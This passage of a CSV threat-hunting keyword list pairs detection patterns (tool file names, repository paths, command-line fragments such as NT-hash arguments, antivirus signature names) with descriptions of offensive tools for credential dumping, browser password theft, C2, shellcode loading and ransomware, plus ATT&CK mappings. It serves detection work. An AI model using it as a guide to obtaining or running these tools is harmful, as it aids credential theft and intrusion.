LOLBAS.","T1059 - T1110 - T1216 - T1220","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/nccgroup/GTFOBLookup","1","1","N/A","N/A","3","215","40","2023-06-16T22:01:43Z","2019-09-23T16:00:18Z" +"*gtworek/Priv2Admin*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1573","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" +"*guardicore*monkey*","offensive_tool_keyword","Github Username","Welcome to the Infection Monkey! The Infection Monkey is an open source security tool for testing a data centers resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server","T1566 - T1569 - T1570 - T1571 - T1572 - T1573","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/h0nus","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*guardicore/monkey*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*guida.exe -*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"*gunicorn ares:app*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*Gupt-Backdoor.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg==*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" +"*-H lm-hash:nt-hash*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*-H 'LMHASH:NTHASH'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*-H 'NTHASH'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*h2csmuggler --scan-list *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*h2csmuggler -x * --test*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*h8mail -*","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","0","N/A","N/A","1","9","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" +"*h8mail -t *@*.*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*h8mail*","offensive_tool_keyword","h8mail","h8mail is an email OSINT and breach hunting tool using different breach and reconnaissance services. or local breaches such as Troy Hunts Collection1 and the infamous Breach Compilation torrent","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/khast3x/h8mail","1","0","N/A","N/A","10","3554","480","2023-08-15T10:50:34Z","2018-06-15T02:47:00Z" +"*Ha3MrX/Gemail-Hack*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","9","815","385","2022-02-18T16:12:45Z","2018-04-19T13:48:41Z" +"*haad/proxychains*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*hackbrowersdata.cna*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" +"*hack-browser-data.exe*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*hack-browser-data/*","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","84","15","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" +"*HACKER*FUCKER*Xeroxxx*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*hackertarget-get-rootdomains *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*hackingtool.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*Hackndo/sprayhound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Hackndo/sprayhound*","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" +"*hackndo@gmail.com*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*Hackplayers/evil-winrm*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*hackrf_sweep -f *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*hacksysteam/CVE-2023-*","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","3","250","57","2023-02-27T04:51:20Z","2023-01-30T12:57:48Z" +"*HackTheWorld*","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far.","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","0","N/A","N/A","9","867","179","2020-04-28T20:17:54Z","2018-02-17T11:46:40Z" +"*hacktool*","signature_keyword","Antivirus Signature","hacktool keyword. a repository could be named as such. o AV signature","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","hacktool signatures","N/A","N/A","N/A","N/A","N/A","N/A" +"*HackTool.ASP.*.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*HackTool.HTML.*.**","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*HackTool.Java.*.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Hacktool.Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Hacktool.Linux*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*HackTool.PHP.*.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Hacktool.Windows*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Hacktool/Win.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*HackTool:Linux*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*HackTool:MSIL*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*HackTool:PowerShell*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*HackTool:PowerShell/*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*HackTool:Python*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*HackTool:Python/*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Hacktool:SH*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*HackTool:VBS*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*HackTool:Win32*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*HackTool:Win32*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*HackTool:Win64*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*HackTool:Win64*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*hacktools-*.xpi*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*Hack-Tools-master*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*Hack-with-Github*","offensive_tool_keyword","Github Username","An Open Source Hacking Tools database","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Hack-with-Github","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*hades_directsys.exe*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" +"*HadesLdr-main*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*hak5/omg-payloads*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*haKCers.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*hakluke/hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*hakrawler -*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*hakrawler.go*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*hakrawler@latest*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*hakrawler-ip-range*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*hakrawler-master*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*haktrails subdomains*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*Hakumarachi/Bropper*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","N/A","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" +"*handelsregister-get-company-names *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*handle_nessus_file*","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*handlekatz.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*handlekatz.x64.*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*handlekatz_bof.*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10",,"N/A",,, +"*handlekatz_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 